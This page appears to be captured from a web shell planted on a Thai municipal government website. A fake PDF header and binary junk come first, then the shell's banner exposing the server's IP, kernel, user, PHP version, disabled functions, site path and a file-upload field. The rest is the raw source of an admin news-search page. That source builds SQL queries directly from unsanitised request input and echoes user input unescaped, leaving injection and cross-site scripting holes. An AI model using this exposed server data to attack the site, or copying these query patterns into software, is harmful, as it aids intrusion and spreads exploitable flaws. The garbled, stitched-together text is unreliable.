%PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
| Server IP : 122.155.177.87 / Your IP : 122.155.177.87 Web Server : Apache/2 System : Linux cat177-87.static.lnwhostname.com 3.10.0-1160.62.1.el7.x86_64 #1 SMP Tue Apr 5 16:57:59 UTC 2022 x86_64 User : apache ( 994) PHP Version : 5.3.29 Disable Function : exec,system,passthru,shell_exec,proc_close,proc_open,dl,popen,show_source,posix_kill,posix_mkfifo,posix_getpwuid,posix_setpgid,posix_setsid,posix_setuid,posix_setgid,posix_seteuid,posix_setegid,posix_uname,putenv,eval MySQL : ON | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /home/thungkhana/domains/thungkhanan.go.th/public_html/news/ |
Upload File : |
<?php
session_start();
if($_SESSION[user]==""){
session_destroy();
$message = "س Login .";
$url = "../admin/index.php";
include("../admin/alert.php");
exit;
}
require_once('../admin/Connections/conndb.php');
mysql_select_db($database_conndb, $conndb);
if($s_name!="" && $s_cat==""){
$query_rsNews = "SELECT * FROM news_detail WHERE name LIKE '%$s_name%' ORDER BY id DESC, created";
}
else if($s_name!="" && $s_cat!=""){
$query_rsNews = "SELECT * FROM news_detail WHERE name LIKE '%$s_name%' AND cat_id LIKE '$s_cat' ORDER BY id DESC, created";
}
else if($s_name=="" && $s_cat!=""){
$query_rsNews = "SELECT * FROM news_detail WHERE cat_id LIKE '$s_cat' ORDER BY id DESC, created";
}
else{
?>
<SCRIPT LANGUAGE="JavaScript">
alert("سŷͧä");
history.back();
</script>
<?
}
$rsNews = mysql_query($query_rsNews, $conndb) or die(mysql_error());
$row_rsNews = mysql_fetch_assoc($rsNews);
$totalRows_rsNews = mysql_num_rows($rsNews);
$query_rsCat = "SELECT * FROM news_category ORDER BY cat_id";
$rsCat = mysql_query($query_rsCat, $conndb) or die(mysql_error());
$row_rsCat = mysql_fetch_assoc($rsCat);
$totalRows_rsCat = mysql_num_rows($rsCat);
?>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><!-- InstanceBegin template="/Templates/template_a.dwt.php" codeOutsideHTMLIsLocked="false" -->
<head>
<!-- InstanceBeginEditable name="doctitle" -->
<script>
function confirmDelete(delUrl) {
if (confirm("ѹź")) {
document.location = delUrl;
}
}
</script>
<!-- InstanceEndEditable -->
<?php
require_once('../admin/Connections/conndb.php');
mysql_select_db($database_conndb, $conndb);
?>
<title>ͧúǹӺŷ觢ҹ 99/9 1 Ӻ 觢ҹ ´ ѧѴ ѹ :: www.thungkhanan.go.th</title>
<meta http-equiv="Content-Type" content="text/html; charset=windows-874">
<link href="../styles.css" rel="stylesheet" type="text/css">
<!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable -->
<style type="text/css">
<!--
body {
margin-left: 0px;
margin-top: 0px;
margin-right: 0px;
margin-bottom: 0px;
background-color: #3CFFFF;
}
-->
</style>
<!--styles -->
<link href="../styles.css" rel="stylesheet" type="text/css" />
<link href="../css/Hover%20Buttons.css" rel="stylesheet" type="text/css"/>
<link href="../css/Hoverable-Sidenav.css" rel="stylesheet" type="text/css"/>
<!--<script src="https://platform-api.sharethis.com/js/sharethis.js#property=5d255a83d97c100012d80679&product='inline-share-buttons'
async='async" type='text/javascript'> -->
</script>
<!--styles -->
<style type="text/css">
<!--
a:link {
text-decoration: none;
}
a:visited {
text-decoration: none;
}
a:hover {
text-decoration: none;
}
a:active {
text-decoration: none;
}
.style6 {color: #FFFFFF}
-->
</style></head>
<body background="../images/0bg1-edit1.png" style="background-repeat:no-repeat; background-position:top">
<!-- content -->
<div align="center">
<table width="100%" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td align="center" valign="top"><tr>
<td height="" align="center" valign="top"><iframe src="/head-slider.html" width="100%" height="627" scrolling="no" frameborder="0" marginheight="0" marginwidth="0"></iframe></td>
</tr>
<tr>
<td align="center" valign="top"> </td>
</tr>
</td>
</tr>
<tr>
<td align="center" valign="top"><table width="980" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td align="center" valign="top"> </td>
</tr>
<tr>
<td align="center" valign="top"> </td>
</tr>
<tr>
<td align="center" valign="top"><!-- InstanceBeginEditable name="EditRegion3" -->
<table width="95%" border="0" align="center" cellpadding="0" cellspacing="0" bordercolor="0">
<tr>
<td height="21" class="under"><div align="center" class="title2">
<?
if($s_cat!=""){
$query_CatS = "SELECT * FROM news_category where cat_id =$s_cat";
$CatS = mysql_query($query_CatS, $conndb) or die(mysql_error());
$row_CatS = mysql_fetch_assoc($CatS);
$cat_id=$row_CatS['cat_id'];
echo $row_CatS['cat_name'];
}else{
echo "Ţ Ҥ";
}
?>
</div></td>
</tr>
<tr>
<td class="head"> </td>
</tr>
<tr>
<td class="styles1"><div align="right"><a href="../admin/main.php" class="styles2">˹ Admin </a>| <a href="admin.php" class="styles2"> ٷ</a> | Ң | <a href="add_category.php" class="styles2">Ǵ</a> | <a href="add_detail.php?cat_id=<? echo $cat_id; ?>" class="styles2"></a> | <a href="../admin/signout.php" class="styles2">͡ҡк </a></div></td>
</tr>
<tr>
<td class="styles1"> </td>
</tr>
<tr>
<td colspan="3" align="left" valign="top"><div align="left">
<table width="99%" border="0" cellspacing="0" cellpadding="0">
<tr>
<td width="60%" class="styles3"><div align="left">šä <span class="title">
<?
if($s_cat!=""){
echo $row_CatS['cat_name'];
}else{
echo "͡Ǵ";
}
?>
- <? echo $s_name;?></span>
ͷ<span class="title"> <?php echo $totalRows_rsNews; ?></span> ¡ </div></td>
<td width="40%" valign="top"><div align="right">
<table width="99%" border="0" cellspacing="1" cellpadding="1">
<form action="admin_search.php" method="post" enctype="multipart/form-data" name="webForm" id="webForm">
<tr>
<td width="50%"><div align="right">
<select name="s_cat" id="s_cat" style="width: 160px;">
<option value="" class="styles1"> -- ͡Ǵ-- </option>
<?php do { ?>
<option value="<? echo $row_rsCat['cat_id']; ?>" class="styles1" <? if($cat_id==$row_rsCat['cat_id']) echo "selected"?>> - <? echo $row_rsCat['cat_name']; ?></option>
<?php } while ($row_rsCat = mysql_fetch_assoc($rsCat)); ?>
</select>
</div></td>
<td width="40%"><div align="right">
<input name="s_name" type="text" class="styles4" id="s_name" style="width: 160px;" maxlength="100" />
</div></td>
<td width="10%"><div align="left">
<input name="okbutton" type="image" title="" value=" " src="images/btn.gif" />
</div></td>
</tr>
</form>
</table>
</div></td>
</tr>
</table>
</div></td>
</tr>
<tr>
<td class="styles1"> </td>
</tr>
<tr>
<td colspan="3" align="left" valign="top"><div align="center">
<table width="98%" border="0" cellpadding="2" cellspacing="0">
<?php
$pagesize=20;
$totalpage=(int)($totalRows_rsNews/$pagesize);
if(($totalRows_rsNews% $pagesize )!= 0){
$totalpage += 1;
}
if(isset($pageid)){
$start=$pagesize * ($pageid - 1);
}
else{
$pageid = 1;
$start = 0 ;
}
if($totalRows_rsNews!="0"){
mysql_select_db($database_conndb, $conndb);
//echo $query_rsNews;
$sql=$query_rsNews." Limit $start ,$pagesize ";
$res = mysql_query($sql, $conndb) or die(mysql_error());
if($pageid==1){
$jk=1;
}
else{
$a=$pageid * $pagesize;
$jk=$a-$pagesize;
}
//echo " jk = ".$jk;
while($c=mysql_fetch_object($res)){
?>
<tr>
<td width="5%" valign="top" class="styles2"><div align="center">
<?
if($pageid==1){
echo $jk;
}
else{
$ak=$jk+1;
echo $ak;
}
?>
</div></td>
<td width="85%" valign="top" class="styles1"><div align="left"><a href="detail.php?id=<? echo "$c->id";?>" class="styles2"><?php echo $c->name; ?></a>
<?php if ($c->filename <> "") {?>
<a href="doc_download/<?php echo $c->filename; ?>" target="_blank"><img src="images/download.gif" alt="ǹŴ͡" width="20" height="22" border="0" align="absmiddle" /></a>
<?php } ?>
<span class="detail-s"> [ҹ <?php echo $c->click; ?> ]</span>
<? $d=explode("-",$c->d_date);
$dd=$d[2];
$mm=$d[1];
switch($mm)
{
case "1":
$printmonth = "..";
break;
case "2":
$printmonth = "..";
break;
case "3":
$printmonth = "..";
break;
case "4":
$printmonth = "..";
break;
case "5":
$printmonth = "..";
break;
case "6":
$printmonth = "..";
break;
case "7":
$printmonth = "..";
break;
case "8":
$printmonth = "..";
break;
case "9":
$printmonth = "..";
break;
case "10":
$printmonth = "..";
break;
case "11":
$printmonth = "..";
break;
case "12":
$printmonth = "..";
break;
}
$yyyy=$d[0];
$yy=$yyyy+543;
echo $dd." ".$printmonth." ".$yy; ?>
</div></td>
<td width="5%" align="center"><div align="center"><a href="edit_detail.php?id=<?php echo $c->id ; ?>"><img src="images/edit.gif" alt="" width="13" height="13" border="0"></a></div></td>
<td width="5%" align="center"><div align="center"><a href="javascript:confirmDelete('delete_detail.php?cat_id=<?php echo $c->cat_id ; ?>&id=<?php echo $c->id ; ?>')"><img src="images/delete.gif" alt="źǢ" width="18" height="18" border="0"></a><a href="javascript:confirmDelete('delete.php?news_id=<?php echo $c->customerid ; ?>')"></a></div></td>
</tr>
<?php $jk++; }
}
else { // Show if recordset empty
?>
<tr>
<td height="100" colspan="4" class="title"><div align="center">ѧբ</div></td>
</tr>
<?php } // Show if recordset empty ?>
</table>
</div></td>
</tr>
<tr>
<td colspan="3"> </td>
</tr>
<tr>
<td class="styles1" colspan="3"><div align="left">ѧʴ˹ :
<?
for($i=1;$i<=$totalpage;$i++){
if($i==$pageid){
echo $i." ";
}
else{
echo "|<a href='admin_search.php?pageid=$i&s_name=".$s_name."&s_cat=".$s_cat."' class='styles2'>$i</a>| ";
}
}
?>
</div></td>
</tr>
<tr>
<td colspan="3"> </td>
</tr>
</table>
<!-- InstanceEndEditable --></td>
</tr>
</table></td>
</tr>
<tr>
<td align="center" valign="top"> </td>
</tr>
<tr>
<td align="center" valign="top"> </td>
</tr>
<tr>
<td align="center" valign="top"> </td>
</tr>
<tr>
<td align="center" valign="top"> </td>
</tr>
<tr>
<td align="center" valign="top" style="background-repeat:no-repeat"><img src="../images/foot.png"></td>
</tr>
</table>
</div>
<!-- end_content -->
<tr><td><a style="display:scroll;position:fixed;bottom:5px;right:5px;" class="backtotop" href="#top" rel="nofollow" title="Back to Top"><img src="../images/up.png" border="0" /></a></td>
</tr>
<map name="Map6" id="Map6"><area shape="rect" coords="210,1,302,41" href="http://www.tratlocal.go.th/index.php" target="_blank" />
</map>
</body>
<!-- InstanceEnd --></html>
<?php
mysql_free_result($rsNews);
if($conndb)
{
mysql_close($conndb);
unset($conndb);
}
?>